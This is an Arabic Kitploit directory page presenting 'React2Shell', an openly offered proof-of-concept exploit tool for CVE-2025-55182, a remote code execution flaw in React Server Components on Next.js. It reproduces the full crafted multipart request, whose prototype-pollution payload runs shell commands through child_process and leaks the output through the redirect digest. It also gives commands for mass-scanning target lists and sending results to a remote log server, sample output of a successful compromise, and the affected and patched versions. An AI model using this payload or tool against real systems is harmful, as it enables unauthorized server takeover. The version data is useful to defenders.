Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell هي أداة استغلال لإثبات المفهوم (PoC) لثغرة CVE-2025-55182 التي تؤثر على تطبيقات React Server Components (RSC) المعرّضة للخطر في Next.js. | Kitploit
أدوات/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell هي أداة استغلال لإثبات المفهوم (PoC) لثغرة CVE-2025-55182 التي تؤثر على تطبيقات React Server Components (RSC) المعرّضة للخطر في Next.js.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 27 أياملم تتم المراجعة بعد

💀 استغلال React2Shell — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 تنفيذ الأكواد عن بُعد في React Server Components

CVE-2025-55182

بقلم INDRA


⚠️ إخلاء المسؤولية

هذا المشروع مُقدَّم لأغراض تعليمية وبحوث أمنية واختبار الاختراق المصرح به فقط.

لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

استخدم هذا الاستغلال فقط ضد الأنظمة التي تملكها أو التي لديك إذن صريح باختبارها.


📖 الوصف

React2Shell هو استغلال إثبات مفهوم لثغرة CVE-2025-55182 التي تؤثر على تطبيقات React Server Components (RSC) الضعيفة في Next.js.

يرسل الاستغلال طلب multipart مُصممًا خصيصًا يستغل تدفق إلغاء التسلسل الضعيف، ويستخرج مخرجات الأوامر عبر استجابة digest الخاصة بإعادة التوجيه في التطبيق.

عند نجاح الاستغلال، يعرض مخرجات الأمر المنفَّذ مباشرةً في الطرفية.


✨ الميزات

  • 🚀 وضع الهدف الواحد
  • 🌍 وضع الفحص الجماعي
  • 🔄 كشف تلقائي لبروتوكولي HTTP وHTTPS
  • ⚡ تنفيذ متعدد الخيوط
  • 📝 تسجيل محلي اختياري
  • 🌐 خادم سجلات عن بُعد اختياري
  • 🎯 مخرجات نظيفة
  • 🛡 تعطيل التحقق من SSL (لبيئات الاختبار)
  • 📂 إزالة الأهداف المكررة

📦 المتطلبات

Python 3.8+

ثبّت التبعيات:

root@kitploit:~
pip install requests urllib3

📁 هيكل المشروع

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 الإصدارات الضعيفة

React


Next.js

الإصدارات الضعيفة

  • 14.3.0-canary.77 وما بعده
  • 15.x
  • 16.x

الإصدارات المُصحَّحة

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 طلب HTTP المُستخدَم

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 الاستخدام

عرض المساعدة

root@kitploit:~
python exploit.py -h

فحص هدف واحد

root@kitploit:~
python exploit.py -u https://target.com

فحص أهداف متعددة

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

التشغيل

root@kitploit:~
python exploit.py -f targets.txt

حفظ النتائج

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

إرسال النتائج إلى خادم سجلات عن بُعد

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

كل الخيارات معًا

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 خيارات سطر الأوامر


🖥 مثال على المخرجات

root@kitploit:~
🚀 Loaded 42 targets (HTTP + HTTPS)

🔥 [VULNERABLE] https://target.com/

💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ كيف يعمل

  1. يقرأ الهدف (الأهداف)
  2. يولّد روابط HTTP وHTTPS تلقائيًا
  3. يرسل طلب multipart مُصممًا خصيصًا
  4. يحلل digest الخاص بإعادة التوجيه
  5. يستخرج مخرجات الأمر
  6. يعرض تأكيد نجاح الاستغلال
  7. يخزن النتائج محليًا أو عن بُعد اختياريًا

📌 ملاحظات

  • يختبر كلاً من HTTP وHTTPS تلقائيًا عند عدم توفير بروتوكول.
  • تتم إزالة الأهداف المكررة تلقائيًا.
  • يستخدم 30 خيطًا متزامنًا.
  • يتجاهل شهادات SSL غير الصالحة.
  • المهلة الزمنية مضبوطة على 10 ثوانٍ.

❤️ الاعتمادات

  • تطوير الاستغلال: INDRA
  • CVE: CVE-2025-55182

⚖️ إشعار قانوني

قد يشكّل الاستخدام غير المصرح به لهذا البرنامج ضد الأنظمة دون إذن انتهاكًا للقوانين المحلية أو الوطنية أو الدولية.

المؤلف غير مسؤول عن أي إساءة استخدام.


⭐ إذا كان هذا المشروع قد ساعد في أبحاثك، ففكّر في منحه نجمة.

صيد سعيد 🕷️

تنزيل الأداة
الإصدارالحالة
19.0⚠ ضعيف
19.1.0⚠ ضعيف
19.1.1⚠ ضعيف
19.2.0⚠ ضعيف
19.0.1✅ مُصحَّح
19.1.2✅ مُصحَّح
19.2.1✅ مُصحَّح
الخيارالوصف
-uعنوان الهدف (URL)
-fملف يحتوي على نطاقات الأهداف
-oحفظ الأهداف الضعيفة محليًا
-lإرسال النتائج إلى خادم سجلات عن بُعد
-hعرض المساعدة